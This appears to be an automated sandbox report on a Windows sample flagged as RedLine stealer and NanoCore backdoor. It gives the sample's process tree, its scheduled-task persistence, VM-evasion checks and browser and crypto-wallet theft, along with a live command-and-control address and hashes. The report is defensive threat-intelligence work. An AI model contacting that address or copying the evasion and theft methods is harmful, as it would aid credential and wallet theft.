                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    Logon Script (Windows)1
                    Scheduled Task/Job
                    4
                    Obfuscated Files or Information
                    Security Account Manager137
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                    Software Packing
                    NTDS1
                    Query Registry
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets351
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                    Virtualization/Sandbox Evasion
                    DCSync241
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1474391 Sample: owKQ0b029a.exe Startdate: 16/07/2024 Architecture: WINDOWS Score: 100 53 api.ip.sb 2->53 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Sigma detected: Scheduled temp file as task from temp location 2->73 75 10 other signatures 2->75 9 owKQ0b029a.exe 10 2->9         started        12 QntRsaVyLKlY.exe 2->12         started        signatures3 process4 file5 47 C:\Users\user\AppData\Local\Temp\...\PO.exe, PE32 9->47 dropped 15 PO.exe 6 9->15         started        81 Multi AV Scanner detection for dropped file 12->81 83 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->83 85 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->85 19 QntRsaVyLKlY.exe 12->19         started        21 schtasks.exe 12->21         started        signatures6 process7 file8 49 C:\Users\user\AppData\...\QntRsaVyLKlY.exe, PE32 15->49 dropped 51 C:\Users\user\AppData\Local\...\tmpBBB1.tmp, XML 15->51 dropped 57 Antivirus detection for dropped file 15->57 59 Multi AV Scanner detection for dropped file 15->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->61 67 5 other signatures 15->67 23 PO.exe 15 49 15->23         started        27 powershell.exe 23 15->27         started        29 powershell.exe 23 15->29         started        35 2 other processes 15->35 63 Tries to harvest and steal browser information (history, passwords, etc) 19->63 65 Tries to steal Crypto Currency Wallets 19->65 31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        signatures9 process10 dnsIp11 55 185.222.57.67, 49709, 49714, 49720 ROOTLAYERNETNL Netherlands 23->55 77 Tries to steal Crypto Currency Wallets 23->77 37 conhost.exe 23->37         started        79 Loading BitLocker PowerShell Module 27->79 39 conhost.exe 27->39         started        41 WmiPrvSE.exe 27->41         started        43 conhost.exe 29->43         started        45 conhost.exe 35->45         started        signatures12 process13

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    owKQ0b029a.exe74%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
                    owKQ0b029a.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe100%AviraHEUR/AGEN.1350997
                    C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe83%ReversingLabsByteCode-MSIL.Spyware.RedLine
                    C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe83%ReversingLabsByteCode-MSIL.Spyware.RedLine
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                    http://185.222.57.67:55615/0%Avira URL Cloudsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    https://api.ip.sb/geoip0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://185.222.57.67:556150%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    185.222.57.67:556150%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    http://185.222.57.67:55615t-eq0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                    http://185.222.57.67:50%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://tempuri.org/00%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://185.222.57.67:55615/true
                      • Avira URL Cloud: safe
                      unknown
                      185.222.57.67:55615true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabtmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectResponsePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.datacontract.org/2004/07/PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sbPO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoipPO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ecosia.org/newtab/tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponsePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0PO.exefalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironPO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentQntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponsePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.222.57.67:55615PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesQntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000306A000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.orgcookies//settinString.RemovegPO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://185.222.57.67:55615t-eqQntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponsePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://185.222.57.67:5PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponsePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdatePO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/0PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO.exe, 00000007.00000002.2154355610.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2239923951.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nextPO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.222.57.67
                      unknownNetherlands
                      51447ROOTLAYERNETNLtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1474391
                      Start date and time:2024-07-16 19:56:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 28s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:owKQ0b029a.exe
                      renamed because original name is a hash value
                      Original Sample Name:5404B47556A2E1E9EB2F5DA481002616.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@25/102@1/1
                      EGA Information:
                      • Successful, ratio: 80%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 337
                      • Number of non-executed functions: 77
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target QntRsaVyLKlY.exe, PID 6976 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: owKQ0b029a.exe
                      TimeTypeDescription
                      13:56:58API Interceptor36x Sleep call for process: PO.exe modified
                      13:57:05API Interceptor31x Sleep call for process: powershell.exe modified
                      13:57:08API Interceptor40x Sleep call for process: QntRsaVyLKlY.exe modified
                      13:57:08API Interceptor1x Sleep call for process: owKQ0b029a.exe modified
                      19:57:07Task SchedulerRun new task: QntRsaVyLKlY path: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ROOTLAYERNETNL8LcFUXH9xN.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.74
                      0h6tTGKedZ.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.153
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                      • 45.137.22.78
                      PO2767.xlsGet hashmaliciousFormBookBrowse
                      • 45.137.22.78
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.30710.1319.rtfGet hashmaliciousUnknownBrowse
                      • 45.137.22.78
                      offertfrfrgan.xlsGet hashmaliciousUnknownBrowse
                      • 45.137.22.78
                      p8Uz7qV7t1.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.78
                      opJ1SbGhmm.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.124
                      5QHy8tjDuO.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.171
                      3.bat.exeGet hashmaliciousGuLoaderBrowse
                      • 45.137.22.69
                      No context
                      No context
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1968
                      Entropy (8bit):5.345338934370444
                      Encrypted:false
                      SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
                      MD5:A6AE821E85EB04F10E67C9D65E129C47
                      SHA1:8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
                      SHA-256:BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
                      SHA-512:22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
                      Malicious:false
